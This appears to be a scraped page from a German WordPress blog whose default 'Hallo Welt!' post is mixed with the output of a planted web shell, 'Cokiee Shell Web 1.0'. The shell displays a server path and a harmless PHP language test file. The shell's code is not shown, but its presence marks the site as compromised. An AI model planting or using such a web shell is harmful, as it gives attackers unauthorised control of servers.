Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/tests/lang/ |
Current File : //usr/local/src/php7/php-7.0.5/tests/lang/041.phpt |
--TEST-- Dynamic access of static members --FILE-- <?php class A { public static $b = 'foo'; } $classname = 'A'; $wrongClassname = 'B'; echo $classname::$b."\n"; echo $wrongClassname::$b."\n"; ?> ===DONE=== --EXPECTF-- foo Fatal error: Uncaught Error: Class 'B' not found in %s041.php:%d Stack trace: #0 {main} thrown in %s041.php on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare